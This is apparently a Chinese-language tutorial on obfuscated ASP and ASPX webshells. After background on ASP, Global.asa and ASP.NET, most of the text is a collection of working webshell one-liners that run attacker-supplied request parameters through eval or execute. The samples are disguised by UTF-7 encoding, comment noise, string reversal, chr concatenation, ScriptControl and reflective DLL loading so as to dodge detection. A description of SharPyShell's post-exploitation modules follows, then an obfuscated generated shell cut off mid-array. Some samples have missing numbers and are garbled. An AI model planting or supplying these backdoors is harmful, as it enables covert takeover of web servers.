Deformity ASP/ASPX Webshell、Webshell Hidden Learning
1. Active Server Page(ASP)
ASP是动态服务器页面(Active Server Page),是微软公司开发的代替CGI脚本程序的一种应用,它可以与数据库和其它程序进行交互,是一种简单、方便的编程工具。ASP的网页文件的格式是 .asp。现在常用于各种动态网站中
0x1: ASP脚本类型
微软的ASP语言经历了一个较长的发展周期,本质上是微软把PC上的脚本执行能力嵌入到了服务端(后来集成进了IIS)
. VBScript: VB语言
) ADO(ActiveX Data Object),这个组件使得程序对数据库的操作十分简单
) COM+
. Javascript: 本质上说,Javascript并不是浏览器的专属语言,任何编译继承了Javascript Jit引擎的宿主程序都可以解释并运行Javascript代码,而IIS ASP就集成了Javascript引擎
ASP的基本语法
//注意language、CodePage都可以省略,则默认为VBScript
<%@ language="javascript"%>
<% Response.Write("Hello World!") %> //javascript可以简写为jscript
<%@ language="jscript"%>
<% Response.Write("Hello World!") %> <%@ CodePage= Language="VBScript"%>
<% Response.Write("Hello World!") %>
0x2: ASP内建对象和ActiveX组件的引用
ASP提供一系列由数据和程序代码封装而成的组件,目的是
. 扩展功能
. 简化开发
但是与此同时,丰富的功能也为大马提供了条件,大马可以利用这些扩展组件API实现文件管理、命令执行
ASP提供了六个内建对象,无须事先声明就可以直接使用,它们包括
. Request: 负责从用户端接收信息
. Response: 负责传送信息给用户
. Sever: 负责控制ASP的运行环境
. Session: 负责存储个别用户的信息,以便重复使用
. Application: 负责存储数据以供多个用户使用
. ObjectContext: 可供ASP程序直接配合MTS进行分散式的事务处理
除了ASP内置的内建对象,ASP还可以使用ActionX组件,ActionX组件必须先在服务器上注册,然后使用Server对象的CreateObject方法创建一个组件实例
0x3: global.asa文件
Global.asa文件是一个可选的文件,它可包含可被ASP应用程序中每个页面访问的对象、变量以及方法的声明。所有合法的脚本代码都能在Global.asa中使用
Global.asa文件可包含下列内容
. Application事件
. Session事件
. <object> 声明
. TypeLibrary 声明
. #include 指令
//Global.asa 文件须存放于 ASP 应用程序的根目录中,且每个应用程序只能有一个 Global.asa 文件
Global.asa 中的事件
在 Global.asa 中,我们可以告知 application 和 session 对象在启动和结束时做什么事情。完成这项任务的代码被放置在事件操作器中。Global.asa 文件能包含四种类型的事件
. Application_OnStart: 此事件会在首位用户从 ASP 应用程序调用第一个页面时发生。此事件会在 web 服务器重启或者 Global.asa 文件被编辑之后发生
. Session_OnStart: 此事件会在每当新用户请求他或她的在 ASP 应用程序中的首个页面时发生
. Session_OnEnd: 此事件会在每当用户结束 session 时发生。在规定的时间(默认的事件为 分钟)内如果没有页面被请求,session 就会结束
. Application_OnEnd: 此事件会在最后一位用户结束其 session 之后发生。典型的情况是,此事件会在 Web 服务器停止时发生。此子程序用于在应用程序停止后清除设置,比如删除记录或者向文本文件写信息
Global.asa 文件可能类似这样
<script language="vbscript" runat="server"> sub Application_OnStart
'some code
end sub sub Application_OnEnd
'some code
end sub sub Session_OnStart
'some code
end sub sub Session_OnEnd
'some code
end sub </script>
由于无法使用 ASP 的脚本分隔符(<% 和 %>)在 Global.asa 文件中插入脚本,我们需使用 HTML 的 <script> 元素
<object> 声明
可通过使用 <object> 标签在 Global.asa 文件中创建带有 session 或者 application 作用域的对象。
<object> 标签应位于 <script> 标签之外
<script language="vbscript" runat="server"> sub Application_OnStart
'some code
end sub sub Application_OnEnd
'some code
end sub sub Session_OnStart
'some code
end sub sub Session_OnEnd
'some code
end sub </script> /*
1. scope: 设置对象的作用域(作用范围)
1) Session
2) Application
2. id: 为对象指定一个唯一的 id
3. ProgID: 与 ClassID 关联的 id。ProgID 的格式是:[Vendor.]Component[.Version]
4. ClassID: 为 COM 类对象指定唯一的 id
//ProgID 或 ClassID 必需被指定
*/
<object runat="server" scope="scope" id="id"
{progid="progID"|classid="classID"}>
....
</object>
实例
创建了一个名为 "MyAd" 且使用 ProgID 参数的 session 作用域对象
<object runat="server" scope="session" id="MyAd" progid="MSWC.AdRotator">
</object>
创建了名为 "MyConnection" 且使用 ClassID 参数的
<object runat="server" scope="application" id="MyConnection"
classid="Clsid:8AD3067A-B3FC-11CF-A560-00A0C9081C21">
</object>
在此 Global.asa 文件中声明的这些对象可被应用程序中的任何脚本使用,某个 .ASP 文件:
<%=MyAd.GetAdvertisement("/banners/adrot.txt")%>
Relevant Link:
https://msdn.microsoft.com/zh-cn/library/2x7h1hfk.aspx
https://en.wikipedia.org/wiki/Visual_Basic
https://technet.microsoft.com/zh-cn/library/dn249912.aspx
https://msdn.microsoft.com/en-us/mt173057.aspx
https://technet.microsoft.com/zh-cn/library/bb978526.aspx
https://technet.microsoft.com/zh-cn/library/hh849834.aspx
http://baike.baidu.com/subview/2616/14622918.htm
http://www.w3schools.com/asp/asp_syntax.asp
http://www.w3school.com.cn/asp/asp_globalasa.asp
2. ASP.NET
. ASP.NET 是新一代的 ASP。它无法兼容经典 ASP,但 ASP.NET 可以引用 ASP
. ASP.NET 页面需要编译,因此比经典 ASP 更快
. ASP.NET 拥有更好的语言支持,大量用户控件,基于 XML 的组件,以及对用户认证的整合
. ASP.NET 页面的扩展名是 .aspx,通常由 VB (Visual Basic) 或 C# (C sharp) 编写
. ASP.NET 中的用户控件可以通过不同的语言进行编写,包括 C++ 和 Java
. 当浏览器请求 ASP.NET 文件时,ASP.NET 引擎读取该文件,编译并执行文件中的脚本,然后以纯 HTML 向浏览器返回结果
0x1: ASP.NET脚本类型
ASP.NET支持使用以下几语言进行编程开发
. Visual Basic (VB.NET)
. C# (C sharp)
. J# (Pronounced J sharp)
ASP.NET 是一个开发框架,用于通过 HTML、CSS、JavaScript 以及服务器脚本来构建网页和网站,ASP.NET 支持三种开发模式
. Web Pages: 单页面模型
. MVC: 模型视图控制器
. Web Forms: 事件驱动模型
0x2: Web Pages(单页面模型)
Web Pages 是三种 ASP.NET 编程模型中的一种,用于创建 ASP.NET 网站和 web 应用程序, Web Pages 是最简单的 ASP.NET 网页开发编程模型。它提供了一种简单的方法将 HTML、CSS、JavaScript 以及服务器代码结合起来,Web Pages 通过可编程的 Web Helpers 进行扩展,包括数据库、视频、图像、社交网络等等
<html>
<body>
<h1>Hello Web Pages</h1>
<p>The time is @DateTime.Now</p>
</body>
</html>
0x3: ASP.NET MVC编程模型
MVC 是三个 ASP.NET 开发模型之一,MVC 是用于构建 web 应用程序的一种框架,使用 MVC (Model View Controller) 设计
. Model(模型): 表示应用程序核心(比如数据库记录列表)
. View(视图)对数据(数据库记录)进行显示
. Controller(控制器)处理输入(写入数据库记录)
MVC 模型同时提供对 HTML、CSS 以及 JavaScript 的完整控制
Relevant Link:
http://www.w3school.com.cn/aspnet/webpages_intro.asp
http://www.w3school.com.cn/aspnet/webpages_intro.asp
http://www.w3school.com.cn/aspnet/
http://www.w3school.com.cn/aspnet/mvc_intro.asp
http://www.w3school.com.cn/aspnet/aspnet_intro.asp
3. ASP变形方式
0x1: 一句话木马
<%
execute request("op")
%>
<%execute request(chr())%> <%
eval request("op")
%>
<%eval request.form("#")%>
<%eval request.item("#")%>
<%Eval(Request(chr()))%> password:#
<%Eval(((Request(chr()))))%> 可以有多对括号
0x2: 正常文件插马
当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误
aaarticlea/png;base64,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" alt="" />
加入容错语句可以解决此问题
<% @Language="VBScript" %>
<%
Option Explicit On Error Resume Next
execute request("op") Response.Buffer = True
Dim nVar, strVar, i nVar =
strVar = "Hello World" For i= To nVar
Response.Write strVar
Response.Write "<br>"
Next
Response.End %>
或者使用eval代替execute
<% @Language="VBScript" %>
<%
Option Explicit eval request("op") Response.Buffer = True
Dim nVar, strVar, i nVar =
strVar = "Hello World" For i= To nVar
Response.Write strVar
Response.Write "<br>"
Next
Response.End %>
0x3: 利用CreateObject创建ActiveX Objects执行WEBSHELL
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language = "VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")
''密码: #
%>
下面逐段分析WEBSHELL代码的执行原理
1. ASP内置对象: server 创建Objects对象
The CreateObject method creates an instance of a server component. If the component has implemented the OnStartPage and OnEndPage methods, the OnStartPage method is called at this time.
CreateObject(
progID
)
//progID: Specifies the type of object to create. The format for progID is [Vendor.] Component[ .Version].
2. MSScriptControl.ScriptControl.1对象
Microsoft(R) Script 控件使用户可以创建运行任何 ActiveX(R) scripting 引擎,例如 Microsoft(R) Visual Basic (R) Scripting Edition 或Microsoft(R) JScript(TM) 的应用程序。用户可以将任何 Automation 对象的对象模型添加到 Script 控件中,这样该对象的方法和属性就可以为 scripting 引擎所使用。通过将某个应用程序的对象模型和某个scripting 引擎加以综合,用户就可以创建一个结合了两方面优点的 scripting 应用程序。应用程序不但具有 scripting 语言的简单化特点,而且综合了一种更高级、具有完整特性的专业应用程序的对象、方法,以及属性
Microsoft Script 控件可作为一个控件或者作为一个独立的 Automation 对象创建出来。该特性可以使得用任何语言书写的应用程序都可以用 ScriptControl 宿主任何兼容的 scripting 语言
3. 选择一种Scripting 语言
为 Script Control 配置正确的 scripting 语言。当在某页上作为控件创建 Script Control 时,Language 属性就被自动初始化为 "VBScript"。当作为一个 Automation 对象来创建 Script Control 时,则Language 属性留作未初始化的状态,而必须由代码作者对其进行设置,若要将 Language 属性设置为 JScript,可使用 Properties 窗口。用户也可以在代码中使用 Language 属性,如下所示
ScriptControl1.Language = "JScript"
//其他 scripting 语言,例如 PERL 和 REXX,都不是由 Microsoft 所提供的,也可以为 Script 控件所用
4. Let host application to expose an object model to the script code
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
0x4: ExecuteGlobal执行WEBSHELL
<%ExecuteGlobal request(chr())%>
0x5: script标签中部署WEBSHELL代码
<script language=VBScript runat=server>
if request(chr())<>"" then
ExecuteGlobal request(chr())
end if
</script>
0x6: UTF7 WEBSHELL
MIME(Multipurpose Internet Mail Extensions) 中没有将 Unicode 定义为一种许可的字符集,也没有规定其如何编码。虽然已有其他的一些编码格式(如: UTF-8)应用于邮件当中,但它们使用了128到255之间的数值去表示 Unicode 字符,这对于非 US-ASCII 的字符集的编解码是不利的
因为很多邮件网关和系统无法正确地提交八位的 US-ASCII 码,这样使用扩展的 US-ASCII 的字符将出现丢失位(bit)的情况。由于 UTF-7 只使用 7 位(bit),最高位不使用,因此 UTF-7 编码能够完整的在这些系统中进行传输
对于部分US-ASCII 字符和 US-ASCII 以外的字符,UTF-7 采用"变字节顺序"的方法进行解码,并使用 US-ASCII 中的保留字符作为转换字符(shift character),UTF-7 将 Unicode 字符分为三种进行处理
. 直接进行编码的字符,即直接使用 US-ASCII 作为编码的字符。这类字符包括大小写字母、数字字符、以及下列字符(注意不包含字符 + )
' ( ) , - . / : ? . 可选择的直接进行编码的字符(注意不包含字符 \ 和字符 ~)
! " # $ % & * ; < = > @ [ ] ^ _ ' { | } . 除1、2两种字符以外的 Unicode字符
UTF-7 的编码规则
. direct encoding
对于第一类字符,直接使用 US-ASCII 进行编码,对于第二类字符,则可选择的使用 US-ASCII 或变字节顺序的方法进行编码。但要注意,在邮件头中,若直接对第二类字符使用 US-ASCII 进行编码,可能会出现某些网关无法正确读取的现象 . Unicode shifted encoding
除字符 "+" 和第一、二类两种字符以外字符需采用变字节顺序的方法进行解码,使用符号 "+" 控制编码过程的开始,直到遇到回车,换行字符或文末则结束,并使用 "-" 控制编码过程的结束。在 "+" 与 "-" 的编码采用 Base64 编码表示
例如: 字符串"A≠Α"(Unicode: )的编码为:A+ImADkQ-(ASCII: 2B 6D 6B 2D)
特殊字符 "+" 的编码为2B2D(H)。当出现编码为2B2D(H),即"+-"的特殊情况时,直接则认定 2D(H) 无效,并予以忽略。因此2B2D(H)编码,解码得到的字符串为"+",而不是"+-"。对于编码2B2D2D(H),解码得到的字符串才是"+-"。 . 空格(dec ), 跳格(dec ), 回车(dec )和换行(dec ),直接使用 US-ASCII 进行编码
WEBSHELL实例
<%@codepage=%>
<%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>
/*
解密后
<%@codepage=65000%>
<%response.codepage=936:eval request("#")%>
*/
Relevant Link:
http://www.aspheute.com/english/20011123.asp
https://msdn.microsoft.com/en-us/library/ms524786(v=vs.90).aspx
https://msdn.microsoft.com/en-us/library/aa227633(v=vs.60).aspx
http://www.jb51.net/article/53368.htm
https://support.microsoft.com/en-us/kb/185697
https://msdn.microsoft.com/en-us/library/aa227637(v=vs.60).aspx
http://www.wpuniverse.com/vb/showthread.php?35313-ScriptControl-Another-Method-to-run-VBScript-Code
http://www.cnblogs.com/fvan/archive/2006/02/26/338326.html
0x7: MS Script Encoder Decoded(VBScript)
. VBScript 是微软公司出品的脚本语言,VBScript 是微软的编程语言 Visual Basic 的轻量级的版本,同时它也是ASP (Active Server Pages)默认使用的脚本语言
. 将 <%@ language="language" %> 这一行写到 <html> 标签的上面,就可以使用另外一种脚本语言来编写子程序或者函数:
/*
<% @Language="VBScript" %>
<%
..
%>
*/
微软为ASP提供了一个Script Encoder工具,可以将ASP中的VBScript或JScript编码,让整个ASP脚本文件看起来像一个乱码文件,例如
<script language="VBScript.Encode">
#@~^KQAAAA==@#@&j1D
bwYc214W,J3x1W[roPbdP1WW^ZZJ@#@&PQsAAA==^#~@</script>
ASP对如果在文件头声明中发现VBScript.Encode,同时在之后的内容中检测到
#@~^
..
^#~@
则自动对#@~^(内容)^#~@中的密文进行解密并解释执行
Relevant Link:
http://ayra.ch/service/vbs/vbs.asp
http://www.runoob.com/vbscript/vbscript-tutorial.html
http://www.microsoft.com/china/vbscript/vbstutor/vbswhat.htm
http://blog.miniasp.com/post/2008/03/19/ASP-VBScript-Encoding-Decoding-Tool-Script-Encoder.aspx
0x8: 通过变量传递外部参数执行WEBSHELL
<%
a = request("op")
eval(a)
%>
另一种变量传递方式
<%if request ("")<>""then session("")=request(""):end if:if session("")<>"" then execute session("")%>
0x9: 注释符花代码绕过检测规则
<%@ Page Language = Jscript %>
<%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/
"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+
"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+
","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval
(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%> 密码 -
<%@ Page Language="Jscript"%>< %eval(Request.Item["shezhang"],"unsafe");%>
//密码是webadmin
Relevant Link:
http://www.jb51.net/article/11142.htm
https://msdn.microsoft.com/en-us/library/aa260861(v=vs.60).aspx
0x10: 自定义编码函数绕过检测特征
StrReverse Replace加密,解密后为:Execute eval request("cmd")
<%
Function decode(Code)
decode=Replace(StrReverse(Code),"/*/","""") '函数名作为变量,表示要返回的数据。而且""""",表示只有一个双引号("""),只能用"""",其他都会报错
End Function Execute decode(")/*/dmc/*/(tseuqer lave") 'eval request(/*/cmd/*/)
%> A
0x11: 利用chr隐藏字符,用+号拼接字符
<%eval (eval(chr()+chr()+chr()+chr()+chr()+chr()+chr())(""))%>
0x12: 利用asp的&连接符
ASP中&号的主要作用是用来连接的,包括:字符串-字符串、字符串-变量、变量-变量等混合连接
<%
response.write("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&""&"-"&""&"-"&""&")"&")")
eval("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&""&"-"&""&"-"&""&")"&")")
%> //eval(request(0-2-5))
需要明白的是,ASP对函数调用的格式比较松散,调用的函数名和参数之间并不强制要求括号,例如
call myfunc(x,y)或者call mysub(x,y)
等效于:
myfunc x,y或者mysub x,y
0x13: 自定义命令执行函数
<script runat="server" language="JScript">
function popup(str) {
var q = "u";
var w = "afe";
var a = q + "ns" + w;
var b= eval(str,a);
return(b);
}
</script>
<%
popup(popup(System.Text.Encoding.GetEncoding().
GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0=))));
%>
0x14: 利用Replace、StrReverse隐藏敏感关键字
<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%> password:z
0x15:利用if-else请求判断
<%if Request("LandGrey")<>"" then ExecuteGlobal request("LandGrey") end if %>
0x16:request变量替换
<%if request("LandGrey")<>""then session("LandGrey")=request("LandGrey"):end if:if session("LandGrey")<>"" then execute session("LandGrey")%>
0x17:利用类的构造和析构函数执行代码
类初始化:
<%
Class LandGrey
Private Sub Class_Initialize
eval (request("LandGrey"))
End Sub
End Class Set X = New LandGrey
%>
类析构:
<%
Class LandGrey
Private Sub class_terminate
eval (request("LandGrey"))
End Sub
End Class Set X = New LandGrey
Set X = Nothing
%>
0x18:利用ASP内置的CreateObject创建ScriptControl组件对象,然后执行VBscript代码
<%@ language = VBscript %>
<%<!--%^_^%-->
SET LandGrey = server.CreateObject("mS"&chr()&"cR"&chr()&"pTCo"&Chr()&Chr()&"rOL.Sc"&chr()&"IpTCo"&Chr()&Chr()&"rOL.1")
LandGrey.lANguaGE = cHr()&"BsC"&CHR()&chr()&"PT"
LandGrey.AddObject "REsponse", Response
LandGrey.AddObject "r"&chr()&"quEst", requesT
LandGrey.AddObject "s"&chr()&"ssIon", sessiOn
LandGrey.AddObject "serv"&chr()&"r", serVer
LandGrey.AddObject "apPlic"&CHR()&"tIon", application
LandGrey.eXECuTeStAtEmENt("eV"&CHr(&)&"L"&Chr()&"rEqU"&cHr()&"St("&chr()&"LandGrey"&chr()&CHR()&")")
%>
Relevant Link:
https://xz.aliyun.com/t/2356
0x19:利用ASP反射机制动态加载dll shellcode代码
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
public class Handler:IHttpHandler
{
public void ProcessRequest(HttpContext context){ if (context.Request["list"]!=null)
System.Reflection.Assembly.Load(Convert.FromBase64String(context.Request["res"])).CreateInstance("U").Equals(context);
}
public bool IsReusable {
get {
return false;
}
}
}
0x20:SharPyShell - tiny and obfuscated ASP.NET webshell for C# web applications
SharPyShell是一个用于C#Web应用程序的小型混淆版ASP.NET webshell,执行由加密信道接收的命令,并在运行时将它们编译到内存中。
SharPyShell是一个由Python编写的后渗透框架,它能够:
- 生成混淆的webshell(generate)
- 模拟Windows终端作为webshell的交互(interact)
该框架的主要目的主要在于:
- 为渗透测试人员提供一系列工具,以便在对 IIS webserver成功利用后简化后期利用阶段
- 此工具不能替代C2 Server的框架(如Meterpreter,Empire等),但它非常适用于入站和出站连接完全受限的服务器环境。它包含了你在目标服务器cmd中将可能用到的所有有关privesc,netdiscovery以及横向渗透的工具
- 旨在尽可能做到隐蔽的在内存中执行c#代码和powershell模块
- SharPyShell中实现的混淆,旨在躲避文件签名和网络签名检测。对于网络签名检测的躲避,开发了用于发送命令和接收输出的完全加密的信道
- 通过对负责运行时编译c#代码的预编译DLL进行反射,可以躲避文件签名检测。
模块:
- #download 从服务器下载文件
- #exec_cmd 在服务器上运行cmd.exe /c命令
- #exec_ps 在服务器上运行powershell.exe -nop -noni -enc'base64command'
- #invoke_ps_module 在目标服务器上运行ps1脚本
- #invoke_ps_module_as 以特定用户身份在目标服务器上运行ps1脚本
- #lateral_psexec 运行psexec二进制文件(横向渗透)
- #lateral_wmi 运行内置WMI命令(横向渗透)
- #mimikatz 直接在内存中运行mimikatz的离线版本
- #net_portscan 使用常规套接字运行端口扫描
- #privesc_juicy_potato 发起Juicy Potato攻击,冒充NT AUTHORITY\SYSTEM用户
- #privesc_powerup 运行Powerup模块评估privesc的所有错误配置
- #runas 运行cmd.exe /c命令,以特定用户的身份生成新进程
- #runas_ps 运行powershell.exe -enc以特定用户形式生成新进程
- #upload 将文件上传到服务器
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Reflection" %> <script Language="c#" runat="server"> void Page_Load(object sender, EventArgs e)
{
string p = "42a9798b99d4afcec9995e47a1d246b98ebc96be7a732323eee39d924006ee1d";
string r = Request.Form["data"];
byte[] a = {0x79,0x68,0xf1,0x39,0x34,0x39,0x38,0x62,0x3d,0x39,0x64,0x34,0x9e,0x99,0x63,0x65,0xdb,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x21,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0xe5,0x65,0x31,0x64,0x3a,0x2d,0xdb,0x37,0x37,0x8d,0x31,0xaf,0x18,0x81,0x65,0x78,0xac,0x47,0x37,0xd,0xa,0x4a,0x19,0x49,0x47,0xa,0x53,0x45,0x0,0x5c,0x44,0x51,0x55,0x58,0xc,0x56,0x4c,0x45,0x0,0x6,0x19,0x44,0x17,0xb,0x17,0x8,0x59,0x13,0x76,0x7c,0x61,0x13,0x8,0xa,0x1,0x56,0x17,0x69,0x34,0x38,0x10,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x64,0x77,0x61,0x39,0x7b,0x38,0x3b,0x62,0xc5,0x70,0x3f,0x68,0x61,0x66,0x63,0x65,0x63,0x39,0x39,0x39,0xd5,0x65,0x3a,0x16,0x6a,0x30,0x6c,0x32,0x34,0x3c,0x62,0x39,0x38,0x63,0x62,0x63,0x39,0x36,0x62,0x65,0x49,0x48,0x37,0x33,0x32,0x13,0x32,0x33,0x65,0x25,0x65,0x33,0x39,0x64,0x79,0x32,0x34,0x10,0x30,0x36,0x65,0x67,0x31,0x64,0x30,0x32,0x61,0x39,0x37,0x39,0x38,0x62,0x3d,0x39,0x64,0x34,0x61,0x66,0x63,0x65,0x63,0xb9,0x39,0x39,0x35,0x67,0x34,0x37,0x61,0x31,0x64,0x32,0x37,0x36,0x22,0x3c,0x38,0x65,0x72,0x63,0x39,0x26,0x62,0x65,0x37,0x61,0x27,0x33,0x32,0x23,0x32,0x33,0x65,0x65,0x65,0x33,0x29,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x4,0x1b,0x61,0x39,0x7c,0x39,0x38,0x62,0x39,0x79,0x64,0x34,0xb9,0x64,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x5,0x62,0x63,0x35,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x32,0x61,0x39,0x37,0x39,0x38,0x62,0x39,0x39,0x64,0x34,0x61,0x66,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x11,0x64,0x32,0x3c,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x3f,0x41,0x37,0x33,0x7a,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x1a,0x44,0x55,0x4e,0x11,0x65,0x31,0x64,0xb0,0x3b,0x61,0x39,0x37,0x19,0x38,0x62,0x39,0x33,0x64,0x34,0x61,0x64,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x31,0x64,0x32,0x14,0x36,0x62,0x59,0x16,0x17,0x11,0x11,0x5a,0x36,0x62,0x65,0xef,0x63,0x37,0x33,0x32,0x73,0x32,0x33,0x65,0x61,0x65,0x33,0x39,0x68,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x32,0x61,0x39,0x77,0x39,0x38,0x22,0x17,0x4b,0x1,0x58,0xe,0x5,0x63,0x65,0x6f,0x39,0x39,0x39,0x35,0x5,0x34,0x37,0x61,0x33,0x64,0x32,0x34,0x26,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x72,0x33,0x32,0x71,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x54,0x1b,0x61,0x39,0x37,0x39,0x38,0x62,0x71,0x39,0x64,0x34,0x63,0x66,0x66,0x65,0x8f,0x18,0x39,0x39,0x71,0x62,0x34,0x37,0x60,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x32,0x61,0x39,0x37,0x39,0x38,0